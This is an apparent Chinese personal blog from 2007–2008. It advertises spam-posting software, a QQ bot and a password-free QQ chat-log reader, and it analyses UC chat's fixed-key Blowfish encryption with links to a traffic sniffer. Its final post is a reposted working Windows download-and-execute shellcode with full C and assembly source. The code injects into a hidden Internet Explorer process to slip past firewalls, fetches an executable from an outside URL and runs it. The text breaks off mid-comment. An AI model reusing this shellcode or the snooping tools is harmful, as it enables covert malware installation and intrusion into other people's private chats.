在夜里看星海

qq显隐身软件andQQ聊天室群发软件破解版and论坛群发软件免费版andQQ聊天记录查看器

wuhan2001@hotmail.com(夜星海) — Thu,19 Jun 2008 17:37:59 +0800

QQ聊天室群发软件破解版and论坛群发软件免费版and供求信息发布软件破解版and网站推广软件andqq隐身软件



       今天在google上发现这些排名相当靠前的软件，全部指向同一个网站，而且统一出现：错误信息 → 访问娱乐商务错误信息

       不得不佩服人家的seoer，高手就是高手！

        想想我为什么那摩笨呢，干脆也借用一下下得了！呵呵

        垃圾软件用在不同的场合也是有用，比如现在！
哈哈，所有软件请到星海软件工作室http://www.msgba.cn下载

                                                        夜星海

新版C#QQ机器人

wuhan2001@hotmail.com(夜星海) — Mon,18 Feb 2008 18:29:22 +0800

           这几天在亲戚家没有电脑，手机流量也用完了，只有跑到网吧里上网，可怜啊。没什么事情把以前开发的C#QQ机器人修改了一些，给QQ机器人增加了汉字转拼音，和IP查询功能，时间快到了，就说到这里
       大家可以在这里看一下截图


　　

　　

　　11.jpg (81.18 KB)

　　程序界面

　　2007-12-28 23:25

　　

　　

　　22.jpg (84.54 KB)

　　程序界面2

　　2007-12-28 23:25

　　

　　

　　444.jpg (45.52 KB)

　　程序的类

　　2007-12-28 23:25

　　

　　

　　555.jpg (12.4 KB)

　　程序的类2

　　2007-12-28 23:25

　　

　　

　　

　　666.jpg (20.18 KB)
     大家可以到这里下载得看一下
     http://www.msgba.cn/QQrobot.htm

QQ消息管理器(QQ聊天记录查看器)

wuhan2001@hotmail.com(夜星海) — Sat,02 Feb 2008 21:40:37 +0800

        这两天没什么事,在家里研究了一下QQ聊天记录的数据库,开发了一个QQ消息管理器,可以让我不用密码,不用打开QQ也可以查看本地电脑上面所有QQ的聊天记录
    大家可以到这里去看一下截图
    http://www.msgba.cn

UC加密算法与解密

wuhan2001@hotmail.com(夜星海) — Sun,23 Dec 2007 20:23:41 +0800

概述：

    UC是一款比较有名的国产聊天软件，早先由longmaster开发，现在已经被新浪收购。目前新浪Web语音聊天室也已经改装为使用UC插件了。这样一来新浪的Web聊天室看上去也很“安全”了。

    本文谈谈UC的文本加密方法，主要还是讲分析方法要点和Blowfish的特征，因为结果本身并没有什么好讲的，还原实现直接看代码就可以了。

http://www.team509.com/download/ucsniffer.rar
http://www.team509.com/download/ucsniffer.src.rar

正文：

    我注意到UC的时候它的版本是v2.40，那时UC的聊天数据就已经加密了，，一直到现在的UC2005（内部版本号好象是什么4.10.625）。另外软件本身也加了壳，在这一点上，UC比QQ做的好那么一点。然而，它的聊天文本加密是一个典型的完全不顾及密码学基本常识的蹩脚作品。我是说，它居然使用固定密钥！！！实际上再好的公开算法，也经不住固定密钥的糟蹋。真是可惜呀。

    关于Blowfish：Blowfish算法是密码学牛人Bruce Schneier设计的算法，是一个64位分组，变长密钥的分组密码算法。据作者本人讲，设计这个算法要达到四个目标：Fast，Compact， Simple和Variably Secure，想来应该是做到了。我不是十分清楚对该算法的分析现在达到了什么境界，不过本文目的不是去分析算法，而是针对特定的错误应用找出其中的漏洞。因此我们只要能辨认出这个算法就可以了。

    这个算法明显的汇编特征是，需要维护一个不小的表，加密的轮函数需要不断查表以进行运算。具体一点说是4个100h元的数组，每个元是一个32位整数。总计大小4*400h*4=1000h字节。另外附近还有一个18个元素的表，每个元素也是4字节。这些表的数值由加密密钥初始化而得到，但是在以后的加密过程中这个表是只读的，就是说其中的数据是不变的。表的使用方法是，把输入的整数拆分成四个字节，分别作四次查表，得到的结果作加法和异或运算后得到最后的该轮运算的结果。如果你看到某加密算法的汇编代码中有这样特征的话，十有八九就是Blowfish了。

    分析UC的过程，这里以UC2.40为例。首先查壳，ASPack 2.11 -> Alexey Solodovnikov（后来变成了ASPack 2.12），脱壳过程就不赘述了，跟踪也不难，稍微细心一点，我们应该很快就能找到对数据进行加密处理的地方。一层层钻进call里面去后，我们可以看到下面这样一段代码：

.text:005F92D4 sub_5F92D4      proc near               ; CODE XREF: sub_5F9330+23 p
.text:005F92D4                                         ; sub_5F9394+24 p
.text:005F92D4
.text:005F92D4 var_2           = word ptr -2
.text:005F92D4 arg_0           = dword ptr  8
.text:005F92D4 arg_4           = dword ptr  0Ch
.text:005F92D4
.text:005F92D4                 push    ebp
.text:005F92D5                 mov     ebp, esp
.text:005F92D7                 push    ecx
.text:005F92D8                 push    ebx
.text:005F92D9                 mov     eax, [ebp+arg_4]
.text:005F92DC                 mov     edx, [ebp+arg_0]
.text:005F92DF                 mov     ecx, eax
.text:005F92E1                 and     cx, 0FFh
.text:005F92E6                 mov     [ebp+var_2], cx
.text:005F92EA                 shr     eax, 8
.text:005F92ED                 mov     ebx, eax
.text:005F92EF                 and     bx, 0FFh
.text:005F92F4                 shr     eax, 8
.text:005F92F7                 mov     ecx, eax
.text:005F92F9                 and     cx, 0FFh
.text:005F92FE                 movzx   ecx, cx
.text:005F9301                 shr     eax, 8
.text:005F9304                 and     ax, 0FFh ; 到这里之前把输入拆成了4个单字节
.text:005F9308                 movzx   eax, ax
.text:005F930B                 mov     eax, [edx+eax*4+48h] ; 这里
.text:005F930F                 add     eax, [edx+ecx*4+448h] ; 这里
.text:005F9316                 movzx   ecx, bx
.text:005F9319                 xor     eax, [edx+ecx*4+848h] ; 这里
.text:005F9320                 movzx   ecx, [ebp+var_2]
.text:005F9324                 add     eax, [edx+ecx*4+0C48h] ; 这里
.text:005F932B                 pop     ebx
.text:005F932C                 pop     ecx
.text:005F932D                 pop     ebp
.text:005F932E                 retn
.text:005F932E sub_5F92D4      endp

    看到了吗？EDX这个地方是一个18元的整数表，其实也就是Blowfish代码中维护的P盒，18*4=72=48h，那么EDX+48h，EDX+448h，EDX+848h和EDX+C48h就是S盒了，每个大小400h。标注“这里”的这四句是四次查表运算，结果放在EAX里返回。完全和Blowfish的轮函数F相同，所以看到这里，基本可以确定算法就是Blowfish了。多次观察加密过程，可以发现这个表里的数据总是不变的，说明UC的运行没有任何密钥协商过程，用的是固定密钥。

    Bruce原来的代码（http://www.schneier.com/code/bfsh-sch.zip）中用P，S来命名，我觉得不大好，所以我改写的时候稍微把名字加长了些。

    由于固定密钥，为了代码的简便，我选择了直接从内存里（7B0034）把这段生成好的1048h字节数据扒下来，写在了我的解密代码中，这也就是我的代码中P_BOX和S_BOX的来历。这样做一个好处是省去了调用InitializeBlowfish函数的时间，另外也真正做到专码专用了。只要UC一天不改，这代码就一天有效，决不含糊。

    现在的UC还是一直就使用这样的算法，至少两年都没改过了，而且还把新浪Web聊天室也如此包装了一下。解密既然不难，接下来的事情其实就都没有难度了，我随便分析了一下，写了个ucsniffer。

    关于UC的语音聊天没有仔细研究，如果没改动过的话，应该还是明码，直接在线收听或者录下来慢慢听都是可以实现的。

结论：
    总地来说我觉得Blowfish算法本身应该还是不错地，知道使用Blowfish也说明作者应该懂一些密码安全知识，可惜最糟糕的事情莫过于此，固定的密钥把所有本来应该有的安全性全部破坏掉了。

Down&Exec Shellcode

wuhan2001@hotmail.com(夜星海) — Sat,10 Nov 2007 02:22:47 +0800

文章作者：gyzy (www.gyzy.org)
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

  在溢出发生在诸如Office等等时，Down&Exec的Shellcode往往用的很少，因为大多数防火墙都会弹出一个框，问你是否允许xx应用程序访问网络，这样就死翘了。所以捆绑MM的Shellcode比较受青睐，这两天搞了一个能穿透普通墙的Shellcode，纯代码注入IE进行下载，然后执行.不过1046的块头略显臃肿，呵呵，纯粹娱乐一下，高手飘过.

Copy code

#include
#include

typedef void (*function)();
function myfun;

unsigned char sh5llcode[] =
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\xDF\x03\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\x0E\x9B\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x90\xC0"
"\x71\x8B\x9B\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9A\xC0\x71\x66\x98\x99\x99\x1A\x5F\x95\x12\x47\x1A\x5F\xD9"
"\x12\x5F\x1A\x5F\xD8\xCF\xDF\x19\xA7\x19\xEC\x63\x19\xAF\x19\xC7"
"\x18\x75\x99\x9D\x99\x99\x12\x75\x10\xEC\x99\x10\xC4\x9D\x10\x0C"
"\x03\x99\x99\x99\x14\xD4\x91\xC8\xF3\x98\xF3\x99\xC9\xF1\x9B\x99"
"\x99\x19\x66\xCE\x6D\x5F\x1C\x15\x99\x99\x99\x19\x14\x1C\x15\x99"
"\x99\x99\x14\xC4\x95\xC9\xCA\xF3\x99\xF3\x99\xF3\x99\x66\xEC\x91"
"\x66\xCE\x61\x66\xEC\x91\x66\xCE\x65\x20\xDD\x99\x99\x99\x5F\x1D"
"\x94\x09\x99\x99\x99\x99\x7B\x6F\x5E\x1C\x09\x99\x99\x99\xDD\x99"
"\x99\x99\xFF\x5E\x1C\x27\x99\x99\x99\x99\x99\x5F\x1C\x25\x99\x99"
"\x99\x98\x14\x1C\x4D\x99\x99\x99\xC9\x14\x1C\x09\x99\x99\x99\xC9"
"\xF3\x99\xF3\x99\xF3\x99\xF3\x99\xF3\x99\xF3\x99\x14\xDC\x95\xC9"
"\xF3\x99\x66\xCE\x79\xF3\xD9\xF1\x99\x89\x99\x99\xF3\xD9\xF3\x99"
"\x66\x2C\x4D\x99\x99\x99\x66\xCE\x7D\x10\x1C\x7D\x99\x99\x99\xF3"
"\x99\xF3\xD9\x66\xEC\x9D\xC9\x66\x2C\x4D\x99\x99\x99\x66\xCE\x71"
"\x12\xDE\x4D\x10\x1C\x75\x99\x99\x99\x12\xDE\x69\x10\x1C\x69\x99"
"\x99\x99\x5E\x1C\x6D\x99\x99\x99\xEC\xEB\xF5\xF4\x5E\x1C\x61\x99"
"\x99\x99\xF6\xF7\xB7\xFD\x5E\x1C\x65\x99\x99\x99\xF5\xF5\x99\x99"
"\x5E\x1C\x8D\x98\x99\x99\xCC\xCB\xD5\xDD\x5E\x1C\x81\x98\x99\x99"
"\xF6\xEE\xF7\xF5\x5E\x1C\x85\x98\x99\x99\xF6\xF8\xFD\xCD\x5E\x1C"
"\xB9\x98\x99\x99\xF6\xDF\xF0\xF5\x5E\x1C\xBD\x98\x99\x99\xFC\xD8"
"\x99\x99\x5E\x1C\xAD\x98\x99\x99\x99\x99\x99\x99\x12\xEC\x99\xAA"
"\x50\xD8\xAA\x59\x35\x1C\x59\xEC\x61\xD8\xAA\x42\x12\xEC\x99\x13"
"\x9F\x11\x1D\x84\xA1\x98\x99\x99\xDF\xDA\x7B\x6A\x5E\x1C\x21\x98"
"\x99\x99\xFA\xA3\xC5\xFE\x5E\x1C\x25\x98\x99\x99\xE0\xE3\xE0\xB7"
"\x5E\x1C\x59\x98\x99\x99\xFC\xE1\xFC\x99\x5E\x1C\x51\x98\x99\x99"
"\x99\x99\x99\x99\x5E\x1C\x55\x98\x99\x99\x99\x99\x99\x99\xF3\xD9"
"\xF1\x99\x89\x99\x99\xF1\x75\x99\x99\x99\xF3\x99\x66\x2C\x4D\x99"
"\x99\x99\x66\xCE\x7D\x10\x1C\x71\x99\x99\x99\xF3\x99\xF1\x75\x99"
"\x99\x99\x14\x0C\x75\x99\x99\x99\xCB\xC9\x66\x2C\x4D\x99\x99\x99"
"\x66\xCE\x71\xF3\x99\xF3\x99\x66\x2C\x71\x99\x99\x99\x66\x2C\x7D"
"\x99\x99\x99\xF3\x99\xF3\x99\x66\x2C\x4D\x99\x99\x99\x66\xCE\x75"
"\xF1\x89\xBE\x99\x99\x66\xCE\x49\x14\x1C\x21\x98\x99\x99\xC9\x66"
"\xCE\x41\xF3\x99\x66\xCE\x45\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB"
"\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\xFD\x64\x66"
"\x66"

"\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xCA"
"\xF5\xFC\xFC\xE9\x99\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB"
"\xFC\xEA\xEA\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED"
"\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB"
"\xF6\xFA\xFC\xEA\xEA\xD8\x99\xCF\xF0\xEB\xED\xEC\xF8\xF5\xD8\xF5"
"\xF5\xF6\xFA\xDC\xE1\x99\xCE\xEB\xF0\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD4\xFC\xF4\xF6\xEB\xE0\x99\xDA\xEB\xFC\xF8\xED\xFC\xCB"
"\xFC\xF4\xF6\xED\xFC\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5\xF6\xF8\xFD"
"\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xD8\xFD\xEF\xF8\xE9\xF0\xAA"
"\xAB\x99\xCB\xFC\xFE\xD6\xE9\xFC\xF7\xD2\xFC\xE0\xDC\xE1\xD8\x99"
"\xCB\xFC\xFE\xC8\xEC\xFC\xEB\xE0\xCF\xF8\xF5\xEC\xFC\xDC\xE1\xD8"
"\x99\xCB\xFC\xFE\xDA\xF5\xF6\xEA\xFC\xD2\xFC\xE0\x99\xCF\x12\xED"
"\xBD\x91\x14\xDF\x91\xC9\x66\xCF\x9D\x14\xD7\xB1\xC8\xC9\x66\x8F"
"\x12\x0F\x79\x99\x99\x99\x12\x17\x45\x99\x99\x99\xCB\xC8\x14\x0F"
"\x55\x99\x99\x99\xCB\x12\xCF\xD1\x14\xD7\xD5\xC8\xCB\x66\x49\x21"
"\x98\x99\x99\x99\xC7\x5B\x9D\x99\x55\x55\x55\x55\x55\xCA\xD6\xDF"
"\xCD\xCE\xD8\xCB\xDC\xC5\xD4\xF0\xFA\xEB\xF6\xEA\xF6\xFF\xED\xC5"
"\xCE\xF0\xF7\xFD\xF6\xEE\xEA\xC5\xDA\xEC\xEB\xEB\xFC\xF7\xED\xCF"
"\xFC\xEB\xEA\xF0\xF6\xF7\xC5\xD8\xE9\xE9\xB9\xC9\xF8\xED\xF1\xEA"
"\xC5\xD0\xDC\xC1\xC9\xD5\xD6\xCB\xDC\xB7\xDC\xC1\xDC\x99"

"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x78\x79\x7A\x72\x65"
"\x67\x2E\x6E\x65\x74\x2F\x67\x79\x7A\x79\x2E\x65\x78\x65\x80\x00";

int main()
{
printf("Win32 \"download & exec shellcode\"\n");
myfun = (function)(int)sh5llcode;
myfun();

return 0;
}

    源代码一并奉上

Copy code

#include
#include

#define     FNENDLONG 0x08
#define     nop     0x90

unsigned char sc[0x1000];
unsigned char buff[]=
"GetProcAddress""\x0"
"Sleep""\x0"       // [edi-0x30]
"GetProcAddress""\x0"   // [edi-0x2C]
"WinExec""\x0"       // [edi-0x28]
"ExitProcess""\x0"         // [edi-0x24] ExitProcess
"CreateProcessA""\x0"   // [edi-0x20]
"VirtualAllocEx""\x0"   // [edi-0x1C]
"WriteProcessMemory""\x0" // [edi-0x18]
"CreateRemoteThread""\x0" // [edi-0x14]
"LoadLibraryA""\x0"       // [edi-0x10]
"Advapi32""\x0"
"RegOpenKeyExA""\x0"   // [edi-0x0C]
"RegQueryValueExA""\x0"   // [edi-0x08]
"RegCloseKey""\x0"     // [edi-0x04]
//"\x56\x8B\x74\x24\x08\x8D\x46\x08\x50\xFF\x56\x04\x8D\x4E\x28\x51"
//"\x50\xFF\x16\x8B\x96\x50\x02\x00\x00\x8B\x8E\x4C\x02\x00\x00\x52"
//"\x51\x8D\x96\x4B\x01\x00\x00\x52\x8B\x56\x48\x8D\x4E\x4C\x51\x52"
//"\xFF\xD0\xB8\x01\x00\x00\x00\x5E\xC2\x04\x00\xCC\xCC\xCC\xCC\xCC"
"\x56\x8B\x74\x24\x08\x8D\x46\x08\x50\xFF\x56\x04\x8D\x4E\x28\x51"
"\x50\xFF\x16\x8B\x96\xE0\x00\x00\x00\x8B\x8E\xDC\x00\x00\x00\x52"
"\x51\x8D\x96\xCC\x00\x00\x00\x52\x8B\x56\x48\x8D\x4E\x4C\x51\x52"
"\xFF\xD0\xB8\x01\x00\x00\x00\x5E\xC2\x04\x00\xCC\xCC\xCC\xCC\xCC"
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\IEXPLORE.EXE""\x0";//0x40
//Advapi32.dll RegOpenKeyEx RegQueryValueEx RegCloseKey
//CreateProcess VirtualAllocEx WriteProcessMemory CreateRemoteThread

unsigned char url[]= "http://www.xyzreg.net/gyzy.exe""\x80";   // 要下载的文件url地址

DWORD   addr;
void shellcode();
void printsc(unsigned char *sc, int len);

void main()
{
unsigned   char   temp;
unsigned   char   *shellcodefnadd, *start;
int       k;
char     *fnendstr   =   "\x90\x90\x90\x90\x90\x90\x90\x90\x90";
int     all, i;

memset(sc, 0, sizeof(sc));

// 定位shellcodefnlock的汇编代码
shellcodefnadd = (unsigned char*)shellcode;
temp = *shellcodefnadd;
if(temp == 0xe9)
{
  ++shellcodefnadd;
  k=*(int *)shellcodefnadd;
  shellcodefnadd+=k;
  shellcodefnadd+=4;
}

// 定位shellcode的起始地址
for(k=0; k <= 0x500; ++k)
{
  if(memcmp(shellcodefnadd+k, fnendstr, FNENDLONG)==0) break;
}

// shellcodefnadd+k+8 是得到的shellcodefnlock汇编代码地址
start = shellcodefnadd+k+8;

// 定位 shellcode 长度
for(k=0; k <= 0x500; ++k)
{
  if(memcmp(start+k, fnendstr, FNENDLONG) == 0) break;
}

// printf("%xn", htons(port));

all = k + sizeof(buff)-1 + sizeof(url);
printf("%d + %d + %d = %d\n", k, sizeof(buff)-1, sizeof(url), all);

i = k-23+sizeof(buff)-1;

printf("解包大小: %d + %d = %d = %X\n", k-23, sizeof(buff)-1, i, i);

memcpy(sc, start, k);
memcpy(&sc[k], buff, sizeof(buff)-1);
memcpy(&sc[k+sizeof(buff)-1], url, sizeof(url));

addr = (DWORD)≻

memcpy(sc+8, &i, 2);

// ================== print ======================
// decode 长度为23字节
printsc (sc, 23);

// xor
for(i=23; i < k+sizeof(buff)-1; i++)
{
  sc[i] ^= 0x99;
  //sc[i]++;
}

printsc(sc+23, k-23);
printsc(sc + k, sizeof(buff)-1);
printsc(sc + k + sizeof(buff)-1, sizeof(url));

//   printsc(sc, k);
//   printsc(buff, sizeof(buff)-1);
//   printsc(url, sizeof(url));
//   printf("n%sn", url);

__asm
{
// jmp     addr
}

return;
}

void printsc(unsigned char *sc, int len)
{
int   l;
// 打印普通shellcode
for(l = 0; l < len; l++)
{
  if(l == 0) printf("\"");
  if((l%16 == 0) && (l != 0))printf("\"\n\"");

  printf("\\x%.2X", sc[l]);

  if(l == len-1) printf("\"");
}
printf("\n\n");

/*
// 打印 iis unicode shellcode
for(l = 0; l < len; l += 2)
{
  if(l == 0) printf(""");
  if((l%16 == 0) && (l != 0))printf(""n"");

  printf("%%u%.2X%.2X", sc[l+1], sc[l]);

  if(l == len-2) printf(""");
}
*/
}

void shellcode()
{
__asm
{
  __emit nop
  __emit nop
  __emit nop
  __emit nop
  __emit nop
  __emit nop
  __emit nop
  __emit nop
}

__asm
{
  /* --------------------解码开始---------------------- */

  jmp     decode_end

decode_start:

  pop     edx         // 得到解码开始位置 esp -> edx
  dec     edx
  xor     ecx,ecx
  mov     cx,0x13D         // 要解码的长度

decode_loop:

  xor     byte ptr [edx+ecx], 0x99
  //sub     byte ptr [edx+ecx],1
  loop   decode_loop
  jmp     decode_ok

decode_end:

  call   decode_start

decode_ok:

/*--------------------解码结束---------------------- */
  jmp     end

start:
  pop     edx         // 指令表起始地址存放在 esp -> edx

  // ===== 从 PEB 中取得KERNEL32.DLL的起始地址 =====
  //
  // 输入:
  // edx => 指令表起始地址 (不需要)
  //
  // 输出:
  // eax => kernel32.dll起始地址
  // edx => 指令表起始地址

  mov     eax, fs:0x30     // PEB
  mov     eax, [eax + 0x0c] // PROCESS_MODULE_INFO
  mov     esi, [eax + 0x1c] // InInitOrder.flink
  lodsd
  mov     eax,[eax+8]

  // ========== 定位GetProcAddress的地址 ==========
  //
  // 输入:
  // eax => kernel32.dll起始地址
  // edx => 指令表起始地址
  //
  // 输出:
  // ebx => kernel32.dll起始地址
  // eax => GetProcAddress地址
  // edx => 指令表起始地址

  mov     ebx,eax       // 取kernel32.dll的起始地址 DLL Base Address
  mov     esi,dword ptr [ebx+3Ch] // esi = PE header offset
  mov     esi,dword ptr [esi+ebx+78h]
  add     esi,ebx       // esi = exports directory table
  mov     edi,dword ptr [esi+20h]
  add     edi,ebx       // edi = name pointers table
  mov     ecx,dword ptr [esi+14h] // ecx = number of name pointers
  xor     ebp,ebp
  push     esi


search_GetProcAddress:
  push     edi
  push     ecx
  mov     edi,dword ptr [edi]
  add     edi,ebx       // 把输出函数名表起始地址存人edi
  mov     esi,edx       // 指令表起始地址存入esi
  //mov     ecx,0Eh       // 函数getprocAddress长度为0Eh
  push     0xE
  pop     ecx
  repe cmps   byte ptr [esi],byte ptr [edi]
  je     search_GetProcAddress_ok

  pop     ecx
  pop     edi
  add     edi,4
  inc     ebp
  loop     search_GetProcAddress

search_GetProcAddress_ok:
  pop     ecx
  pop     edi
  pop     esi
  mov     ecx,ebp
  mov     eax,dword ptr [esi+0x24]
  add     eax,ebx
  shl     ecx,1
  add     eax,ecx
  xor     ecx,ecx
  mov     cx,word ptr [eax]
  mov     eax,dword ptr [esi+0x1C]
  add     eax,ebx
  shl     ecx,2
  add     eax,ecx
  mov     eax,dword ptr [eax]
  add     eax,ebx

  // ============ 调用函数解决api地址 ============
  //
  // 输入:
  // ebx =>kernel32.dll起始地址
  // eax =>GetProcAddress地址
  // edx =>指令表起始地址
  //
  // 输出:
  // edi =>函数地址base addr
  // esi =>指令表当前位置
  // edx =>GetProcAddress 地址

  mov     edi,edx
  mov     esi,edi
  add     esi,0xE         // 0xE 跳过1个字符串"GetProcAddress"

  // ============ 解决kernel32.dll中的函数地址 ============
  mov     edx,eax         // 把GetProcAddress 地址存放在edx
  //mov     ecx,0x5       // 需要解决的函数地址的个数
  push   0x9
  pop     ecx
  call   locator_api_addr

  // ============ 加载Advapi32.dll ============
  //locator_Advapi32:

  //xor     eax,eax       // locator_api_addr返回后eax为0
  //lods
  //test     eax,eax       // ->定位字符串"Advapi32"的起始地址
  //jne     locator_Advapi32       //
  add     esi,0xd         // 0xd即"Advapi32"前面那个字符串的长度，
              // 硬编码可以节省两个字节
  push   edx           // edx是GetProcAddress 地址
  push   esi           // 字符"Advapi32"地址
  call   dword ptr [edi-0x4]     // LoadLibraryA

  // ============ 解决Advapi32中的函数地址 ============
  pop     edx
  mov     ebx,eax         // 将Advapi32.dll起始地址存放在ebx
  //mov     ecx,1         // 函数个数
  push   0x3
  pop     ecx           // 函数个数 <-这种方式省两个字节
  call   locator_api_addr

  // ============ 取得url起始地址 ============
  add esi, 0xC         // RegCloseKey 的长度为0xC
  mov ebx, esi         // 临时保存远线程的执行代码
  add esi, 0x40
  mov eax, esi
  add esi, 0x41
  push esi

searchurl:
  inc esi

  cmp byte ptr [esi], 0x80
  jne searchurl

  xor byte ptr [esi], 0x80     // 把0x80 改成 0x00 结束字符串

  pop esi           // 取得url 的起始地址

  // ============ Shellcode功能实现部分 ============
  /* 堆栈空间利用表
    EBP     ------------> 下载URL地址
    EBP + 0x4 ------------> 远线程函数地址
    EBP + 0x8 ------------> HKEY hkey地址
    EBP + 0xC ------------> 存放注册表读取的IE浏览器路径 0x80字节
    EBP + 0x8C ------------> 路径最大长度，常数 128
    EBP + 0x90 ------------> STARTUPINFO 长度0x44
    EBP + 0xD4 ------------> PROCESS_INFORMATION 长度0x10
    EBP + 0xE4 ------------> 从IE进程申请到的执行函数内存地址
    EBP + 0xE8 ------------> 从IE进程申请到的执行函数参数内存地址
    EBP + 0xEC ------------> 构造传入远线程的参数 0xE4
  */
  sub esp,     0x400       //分配1024字节作局部变量
  mov ebp,     esp
  mov [ebp],     esi       //保存URL地址
  mov [ebp+0x4], ebx       //保存远线程函数地址
  mov [ebp+154], edx       //GetProcAddress地址

  //==================从注册表读取IE浏览器路径
  //int 3
  lea ecx, [ebp + 0x8]
  push ecx
  push KEY_QUERY_VALUE
  push 0
  push eax           //edx -> 键值字符串
  push 0x80000002
  call [edi-0x0C]         //RegOpenKeyExA

  mov [ebp+0x8C],128
  lea eax,[ebp+0x8C]
  lea ebx,[ebp+0xC]
  push eax
  push ebx
  push 0
  push 0
  push 0
  push [ebp + 0x8]
  call [edi-0x08]         //RegQueryValueExA

  push [ebp+0x8]
  call [edi-0x04]         //RegCloseKey

  //==================创建IE进程
  //int 3
  mov ecx,0x44
zero:
  mov [ebp+0x90+ecx],0
  loop zero

  mov dword ptr [ebp+0x90],0x44       //STARTUPINFO si={sizeof(si)};
  mov word ptr [ebp+0xBE],SW_HIDE
  mov [ebp+0xBC],STARTF_USESHOWWINDOW

  lea eax,[ebp+0xD4]
  push eax           //&pi
  lea eax,[ebp+0x90]
  push eax           //&si
  push 0
  push 0
  push 0
  push 0
  push 0
  push 0
  lea eax,[ebp+0xC]       //IE路径
  push eax
  push 0
  call [edi-0x20]         //CreateProcess

  //=================申请内存空间
  push PAGE_EXECUTE_READWRITE
  push MEM_COMMIT
  push 0x40
  push 0
  push [ebp+0xD4]
  call [edi-0x1C]         //VirtualAllocEx
  mov [ebp+0xE4],eax

  push 0
  push 0x40
  push [ebp+0x4]
  push eax
  push [ebp+0xD4]
  call [edi-0x18]         //WriteProcessMemory

  //初始化需要传给远线程的参数 4 + 4 + 32 + 32 + 4 + 128 + 16 + 4 + 4 = 228 = 0xEC
  mov eax,[edi-0x2c]
  mov [ebp+0xEC],eax
  mov eax,[edi-0x10]
  mov [ebp+0xF0],eax

  mov dword ptr [ebp+0xF4],'mlru'
  mov dword ptr [ebp+0xF8],'d.no'
  mov dword ptr [ebp+0xFC],0x00006C6C

  mov dword ptr [ebp+0x114],'DLRU'
  mov dword ptr [ebp+0x118],'lnwo'
  mov dword ptr [ebp+0x11C],'Tdao'
  mov dword ptr [ebp+0x120],'liFo'
  mov dword ptr [ebp+0x124],0x00004165

  mov dword ptr [ebp+0x134],0

  //0x138开始存放下载网址
  mov esi,[ebp]
  xor ecx,ecx
lengthofurl:
  inc ecx
  xor     eax,eax
  lodsb
  test   eax,eax             // 寻找函数名之间的空格x00
  jne   lengthofurl

  inc ecx
  xor ebx,ebx
  mov esi,[ebp]
copyurl:
  mov al,BYTE PTR [esi]
  mov BYTE PTR [ebp+0x138+ebx],al
  inc esi
  inc ebx
  loop copyurl

  mov dword ptr [ebp+0x1B8],0x675C3A63
  mov dword ptr [ebp+0x1BC],'.yzy'
  mov dword ptr [ebp+0x1C0],0x00657865

  mov dword ptr [ebp+0x1C8],0
  mov dword ptr [ebp+0x1CC],0
/*
struct DownInfo
{
DWORD caller;
char*
char filename[16];
DWORD reserved;
DWORD callbacker;
};

struct RemoteParam
{
//rfdeleteLoadLibraryW fnLoadLibrary;
rfRemoteDownExecGetProcAddress fnGetProcAddress;
rfRemoteDownExecLoadLibrary fnLoadLibrary;

//必须得传过去的函数名字
char   strURLMon[32];
char   strURLDownloadToFileA[32];
DownInfo di;
};
*/
  push PAGE_EXECUTE_READWRITE
  push MEM_COMMIT
  push 0xEC
  push 0
  push [ebp+0xD4]
  call [edi-0x1C]         //VirtualAllocEx
  mov [ebp+0xE8],eax

  push 0
  push 0xEC
  lea edx, [ebp+0xEC]
  push edx
  push eax
  push [ebp+0xD4]
  call [edi-0x18]         //WriteProcessMemory

  push 0
  push 0
  push [ebp+0xE8]
  push [ebp+0xE4]
  push 0
  push 0
  push [ebp+0xD4]
  call [edi-0x14]         //CreateRemoteThread

  push 10000
  call [edi-0x30]         //Sleep

  lea eax, [ebp+0x1B8]
  push eax
  call [edi-0x28]         //WinExec

  push 0
  call [edi-0x24]         //ExitProcess

  // ============ 解决api地址的函数 ============
  //
  // 输入参数:
  // ecx 函数个数
  // edx GetProcAddress 地址
  // ebx 输出函数的dll起始地址
  // esi 函数名表起始地址
  // edi 保存函数地址的起始地址

locator_api_addr:

locator_space:
  xor     eax,eax
  lodsb
  test   eax,eax       // 寻找函数名之间的空格x00
  jne     locator_space

  push   ecx
  push   edx
  push   esi         // 函数名
  push   ebx         // 输出函数的dll起始地址
  call   edx
  pop     edx
  pop     ecx
  stos   dword ptr [edi]
  loop   locator_space
  xor     eax,eax
  ret
  // ================== 结束调用 ====================
end:
  call   start
}

__asm
{
  __emit nop
  __emit nop
  __emit nop
  __emit nop
  __emit nop
  __emit nop
  __emit nop
  __emit nop
}

return;
}

/*
struct DownInfo
{
DWORD caller;
char*
char filename[16];
DWORD reserved;
DWORD callbacker;
};

struct RemoteParam
{
//rfdeleteLoadLibraryW fnLoadLibrary;
